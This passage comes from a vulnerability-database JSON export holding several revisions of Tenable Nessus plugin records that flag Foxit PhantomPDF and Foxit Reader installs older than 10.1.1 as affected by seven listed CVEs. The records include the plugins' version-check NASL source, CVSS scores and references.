script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27860\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantompdf\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_phantom_installed.nasl\");\n script_require_keys(\"installed_sw/FoxitPhantomPDF\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'FoxitPhantomPDF';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '10.0', 'max_version' : '10.1.0.37527', 'fixed_version' : '10.1.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:foxitsoftware:phantom", "cpe:/a:foxitsoftware:phantompdf"], "solution": "Upgrade to Foxit PhantomPDF version 10.1.1 or later", "nessusSeverity": "", "cvssScoreSource": "CVE-2020-27860", "vpr": {"risk factor": "Medium", "score": "6.7"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2020-12-09T00:00:00", "vulnerabilityPublicationDate": "2020-12-09T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-06T13:28:51", "differentElements": ["nessusSeverity"], "edition": 8}, {"bulletin": {"id": "FOXIT_PHANTOM_10_1_1.NASL", "hash": "2a167465247efa03f1cc97f6b3b9a95a", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit PhantomPDF < 10.1.1 Multiple Vulnerabilities", "description": "According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows host is prior to 10.1.1. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2020-12-23T00:00:00", "modified": "2021-06-03T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/144566", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27860", "http://www.nessus.org/u?a27a3e57", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13547", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13557", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13548", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13560", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28203", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13570"], "cvelist": ["CVE-2020-13547", "CVE-2020-13548", "CVE-2020-13557", "CVE-2020-13560", "CVE-2020-13570", "CVE-2020-27860", "CVE-2020-28203"], "immutableFields": [], "lastseen": "2021-08-19T12:08:26", "history": [], "viewCount": 18, "enchantments": {"dependencies": {"references": [{"type": "kaspersky", "idList": ["KLA12028"]}, {"type": "nessus", "idList": ["FOXIT_READER_10_1_1.NASL", "FOXIT_PHANTOM_9_7_5.NASL"]}, {"type": "cve", "idList": ["CVE-2020-13560", "CVE-2020-13570", "CVE-2020-13557", "CVE-2020-13548", "CVE-2020-28203", "CVE-2020-13547", "CVE-2020-27860"]}, {"type": "zdi", "idList": ["ZDI-20-1415"]}, {"type": "talos", "idList": ["TALOS-2020-1181", "TALOS-2020-1175", "TALOS-2020-1165", "TALOS-2020-1171", "TALOS-2020-1166"]}], "modified": "2021-08-19T12:08:26", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-08-19T12:08:26", "rev": 2}}, "objectVersion": "1.6", "pluginID": "144566", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144566);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0099-S\");\n\n script_name(english:\"Foxit PhantomPDF < 10.1.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF toolkit installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 10.1.1. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.\");\n # https://www.foxitsoftware.com/support/security-bulletins.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit PhantomPDF version 10.1.1 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27860\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantompdf\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_phantom_installed.nasl\");\n script_require_keys(\"installed_sw/FoxitPhantomPDF\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'FoxitPhantomPDF';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '10.0', 'max_version' : '10.1.0.37527', 'fixed_version' : '10.1.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:foxitsoftware:phantom", "cpe:/a:foxitsoftware:phantompdf"], "solution": "Upgrade to Foxit PhantomPDF version 10.1.1 or later", "nessusSeverity": "Medium", "cvssScoreSource": "CVE-2020-27860", "vpr": {"risk factor": "Medium", "score": "6.7"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2020-12-09T00:00:00", "vulnerabilityPublicationDate": "2020-12-09T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-19T12:08:26", "differentElements": ["vpr"], "edition": 9}, {"bulletin": {"id": "FOXIT_PHANTOM_10_1_1.NASL", "hash": "991b7c2e9acd42cb6fc4898e9f48b994", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit PhantomPDF < 10.1.1 Multiple Vulnerabilities", "description": "According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows host is prior to 10.1.1. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2020-12-23T00:00:00", "modified": "2021-06-03T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/144566", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13560", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13570", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13548", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28203", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13547", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27860", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13557", "http://www.nessus.org/u?a27a3e57"], "cvelist": ["CVE-2020-13547", "CVE-2020-13548", "CVE-2020-13557", "CVE-2020-13560", "CVE-2020-13570", "CVE-2020-27860", "CVE-2020-28203"], "immutableFields": [], "lastseen": "2021-09-24T11:54:39", "history": [], "viewCount": 18, "enchantments": {"dependencies": {"references": [{"type": "kaspersky", "idList": ["KLA12028"]}, {"type": "nessus", "idList": ["FOXIT_PHANTOM_9_7_5.NASL", "FOXIT_READER_10_1_1.NASL"]}, {"type": "cve", "idList": ["CVE-2020-28203", "CVE-2020-13557", "CVE-2020-13548", "CVE-2020-13560", "CVE-2020-13570", "CVE-2020-13547", "CVE-2020-27860"]}, {"type": "zdi", "idList": ["ZDI-20-1415"]}, {"type": "talos", "idList": ["TALOS-2020-1181", "TALOS-2020-1175", "TALOS-2020-1171", "TALOS-2020-1165", "TALOS-2020-1166"]}], "modified": "2021-09-24T11:54:39", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-24T11:54:39", "rev": 2}}, "objectVersion": "1.6", "pluginID": "144566", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144566);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0099-S\");\n\n script_name(english:\"Foxit PhantomPDF < 10.1.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF toolkit installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 10.1.1. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.\");\n # https://www.foxitsoftware.com/support/security-bulletins.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit PhantomPDF version 10.1.1 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27860\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantompdf\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_phantom_installed.nasl\");\n script_require_keys(\"installed_sw/FoxitPhantomPDF\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'FoxitPhantomPDF';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '10.0', 'max_version' : '10.1.0.37527', 'fixed_version' : '10.1.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:foxitsoftware:phantom", "cpe:/a:foxitsoftware:phantompdf"], "solution": "Upgrade to Foxit PhantomPDF version 10.1.1 or later", "nessusSeverity": "Medium", "cvssScoreSource": "CVE-2020-27860", "vpr": {"risk factor": "Medium", "score": "5.9"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2020-12-09T00:00:00", "vulnerabilityPublicationDate": "2020-12-09T00:00:00", "exploitableWith": []}, "lastseen": "2021-09-24T11:54:39", "differentElements": ["vpr"], "edition": 10}, {"bulletin": {"id": "FOXIT_PHANTOM_10_1_1.NASL", "hash": "2a167465247efa03f1cc97f6b3b9a95a", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit PhantomPDF < 10.1.1 Multiple Vulnerabilities", "description": "According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows host is prior to 10.1.1. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2020-12-23T00:00:00", "modified": "2021-06-03T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/144566", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28203", "http://www.nessus.org/u?a27a3e57", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27860", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13548", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13557", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13547", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13570", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13560"], "cvelist": ["CVE-2020-13547", "CVE-2020-13548", "CVE-2020-13557", "CVE-2020-13560", "CVE-2020-13570", "CVE-2020-27860", "CVE-2020-28203"], "immutableFields": [], "lastseen": "2021-10-18T11:44:25", "history": [], "viewCount": 18, "enchantments": {"dependencies": {"references": [{"type": "kaspersky", "idList": ["KLA12028"]}, {"type": "nessus", "idList": ["FOXIT_PHANTOM_9_7_5.NASL", "FOXIT_READER_10_1_1.NASL"]}, {"type": "cve", "idList": ["CVE-2020-13557", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-28203", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13570"]}, {"type": "zdi", "idList": ["ZDI-20-1415"]}, {"type": "talos", "idList": ["TALOS-2020-1165", "TALOS-2020-1181", "TALOS-2020-1175", "TALOS-2020-1166", "TALOS-2020-1171"]}], "modified": "2021-10-18T11:44:25", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-10-18T11:44:25", "rev": 2}}, "objectVersion": "1.6", "pluginID": "144566", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144566);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0099-S\");\n\n script_name(english:\"Foxit PhantomPDF < 10.1.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF toolkit installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 10.1.1. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.\");\n # https://www.foxitsoftware.com/support/security-bulletins.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit PhantomPDF version 10.1.1 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27860\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantompdf\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_phantom_installed.nasl\");\n script_require_keys(\"installed_sw/FoxitPhantomPDF\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'FoxitPhantomPDF';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '10.0', 'max_version' : '10.1.0.37527', 'fixed_version' : '10.1.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:foxitsoftware:phantom", "cpe:/a:foxitsoftware:phantompdf"], "solution": "Upgrade to Foxit PhantomPDF version 10.1.1 or later", "nessusSeverity": "Medium", "cvssScoreSource": "CVE-2020-27860", "vpr": {"risk factor": "Medium", "score": "6.7"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2020-12-09T00:00:00", "vulnerabilityPublicationDate": "2020-12-09T00:00:00", "exploitableWith": []}, "lastseen": "2021-10-18T11:44:25", "differentElements": ["vpr"], "edition": 11}], "viewCount": 18, "enchantments": {"dependencies": {"references": [{"type": "kaspersky", "idList": ["KLA12028"]}, {"type": "nessus", "idList": ["FOXIT_PHANTOM_9_7_5.NASL", "FOXIT_READER_10_1_1.NASL"]}, {"type": "cve", "idList": ["CVE-2020-13557", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-28203", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13570"]}, {"type": "zdi", "idList": ["ZDI-20-1415"]}, {"type": "talos", "idList": ["TALOS-2020-1165", "TALOS-2020-1181", "TALOS-2020-1175", "TALOS-2020-1166", "TALOS-2020-1171"]}], "modified": "2021-10-18T11:44:25", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-10-18T11:44:25", "rev": 2}}, "objectVersion": "1.6", "pluginID": "144566", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144566);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0099-S\");\n\n script_name(english:\"Foxit PhantomPDF < 10.1.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF toolkit installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 10.1.1. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.\");\n # https://www.foxitsoftware.com/support/security-bulletins.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit PhantomPDF version 10.1.1 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27860\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantompdf\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_phantom_installed.nasl\");\n script_require_keys(\"installed_sw/FoxitPhantomPDF\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'FoxitPhantomPDF';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '10.0', 'max_version' : '10.1.0.37527', 'fixed_version' : '10.1.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:foxitsoftware:phantom", "cpe:/a:foxitsoftware:phantompdf"], "solution": "Upgrade to Foxit PhantomPDF version 10.1.1 or later", "nessusSeverity": "Medium", "cvssScoreSource": "CVE-2020-27860", "vpr": {"risk factor": "Medium", "score": "5.9"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2020-12-09T00:00:00", "vulnerabilityPublicationDate": "2020-12-09T00:00:00", "exploitableWith": [], "_object_type": "robots.models.nessus.NessusBulletin", "_object_types": ["robots.models.nessus.NessusBulletin", "robots.models.base.Bulletin"]}, {"id": "FOXIT_READER_10_1_1.NASL", "hash": "9805631673b9b8b3e890730b7f9a8b40", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit Reader < 10.1.1 Multiple Vulnerabilities", "description": "According to its version, the Foxit Reader application installed on the remote Windows host is prior to 10.1.1. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2020-12-23T00:00:00", "modified": "2021-06-03T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/144567", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13557", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27860", "http://www.nessus.org/u?a27a3e57", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13570", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13548", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28203", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13560", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13547"], "cvelist": ["CVE-2020-13547", "CVE-2020-13548", "CVE-2020-13557", "CVE-2020-13560", "CVE-2020-13570", "CVE-2020-27860", "CVE-2020-28203"], "immutableFields": [], "lastseen": "2021-10-18T23:46:22", "history": [{"bulletin": {"id": "FOXIT_READER_10_1_1.NASL", "hash": "a251bcbef0bb8370afd834c7135cc424beb32b507908668d9ffa271e8595c1b6", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit Reader < 10.1.1 Multiple Vulnerabilities", "description": "According to its version, the Foxit Reader application installed on the remote Windows host is prior to 10.1.1. It is,\ntherefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "published": "2020-12-23T00:00:00", "modified": "2020-12-23T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/144567", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?a27a3e57"], "cvelist": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "immutableFields": [], "lastseen": "2020-12-24T02:32:35", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"modified": "2020-12-24T02:32:35", "references": [{"idList": ["KLA12028"], "type": "kaspersky"}, {"idList": ["TALOS-2020-1166", "TALOS-2020-1181", "TALOS-2020-1175", "TALOS-2020-1171", "TALOS-2020-1165"], "type": "talos"}, {"idList": ["FOXIT_PHANTOM_10_1_1.NASL"], "type": "nessus"}, {"idList": ["ZDI-20-1415"], "type": "zdi"}, {"idList": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-13570", "CVE-2020-13547", "CVE-2020-13557"], "type": "cve"}], "rev": 2}, "score": {"modified": "2020-12-24T02:32:35", "rev": 2, "value": 8.0, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "144567", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144567);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/23\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n\n script_name(english:\"Foxit Reader < 10.1.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF viewer installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit Reader application installed on the remote Windows host is prior to 10.1.1. It is,\ntherefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n 